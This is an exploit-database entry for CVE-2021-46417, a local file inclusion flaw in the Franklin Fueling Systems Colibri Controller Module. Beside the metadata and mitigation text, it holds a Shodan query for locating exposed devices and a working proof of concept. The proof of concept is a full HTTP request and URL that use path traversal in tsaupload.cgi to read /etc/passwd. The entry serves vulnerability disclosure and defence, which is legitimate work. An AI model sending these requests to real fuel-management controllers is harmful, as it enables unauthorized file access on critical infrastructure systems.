Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI)

vendor:

Colibri Controller Module

by:

Momen Eldawakhly (Cyber Guy)

7.5

CVSS

HIGH

Local File Inclusion (LFI)

CWE

Product Name: Colibri Controller Module

Affected Version From: 1.8.19.8580

Affected Version To: 1.8.19.8580

Patch Exists: NO

Related CWE: CVE-2021-46417

CPE: a:franklin_fueling_systems:colibri_controller_module:1.8.19.8580

Metasploit:

Other Scripts:

Tags: packetstorm,cve,cve2021,franklinfueling,lfi

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Nuclei References: https://packetstormsecurity.com/files/166671/Franklin-Fueling-Systems-Colibri-Controller-Module-1.8.19.8580-Local-File-Inclusion.html, https://drive.google.com/drive/folders/1Yu4aVDdrgvs-F9jP3R8Cw7qo_TC7VB-R, http://packetstormsecurity.com/files/166610/FFS-Colibri-Controller-Module-1.8.19.8580-Directory-Traversal.html, https://nvd.nist.gov/vuln/detail/CVE-2021-46417

Nuclei Metadata: {'max-request': 1, 'shodan-query': 'http.html:"Franklin Fueling Systems"', 'verified': True, 'vendor': 'franklinfueling', 'product': 'colibri_firmware'}

Platforms Tested: Linux

2022

Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 – Local File Inclusion (LFI)

The Franklin Fueling Systems Colibri Controller Module version 1.8.19.8580 is vulnerable to a local file inclusion (LFI) vulnerability. An attacker can exploit this vulnerability to read arbitrary files on the target system.

Mitigation:

The vendor has not provided a patch or mitigation for this vulnerability at the time of writing. It is recommended to restrict access to the affected module and regularly monitor for any unauthorized access or activity.

Source

Exploit-DB raw data:

# Exploit Title: Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI)
# Date: 7/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://www.franklinfueling.com/
# Version: 1.8.19.8580
# Tested on: Linux [Firefox]
# CVE : CVE-2021-46417

# Proof of Concept

============[ HTTP Exploitation ]============

GET /18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1
Host: 192.168.1.6
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: Prefs=LID%3Des%3BPDS%3DMM/dd/yyyy%3BPDL%3DEEEE%2C%20MMMM%20dd%2C%20yyyy%3BPDY%3DMMMM%2C%20yyyy%3BPTS%3DHH%3Amm%3BPTL%3DHH%3Amm%3Ass%3BDSP%3D.%3BGSP%3D%2C%3BGRP%3D3%3BLDZ%3Dtrue%3BUVL%3DuvGallons%3BULN%3DulMillimeters%3BUTM%3DutCentigrade%3BUPR%3DupPSI%3BUP2%3Dup2inWater%3BUP3%3Dup3inHg%3BUFL%3Dufgpm%3BUDY%3Dudkgpcm%3BUMS%3Dumkgrams%3BRPR%3D30%3BXML%3Dfalse%3B
Upgrade-Insecure-Requests: 1

============[ URL Exploitation ]============

http://192.168.1.6/18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password=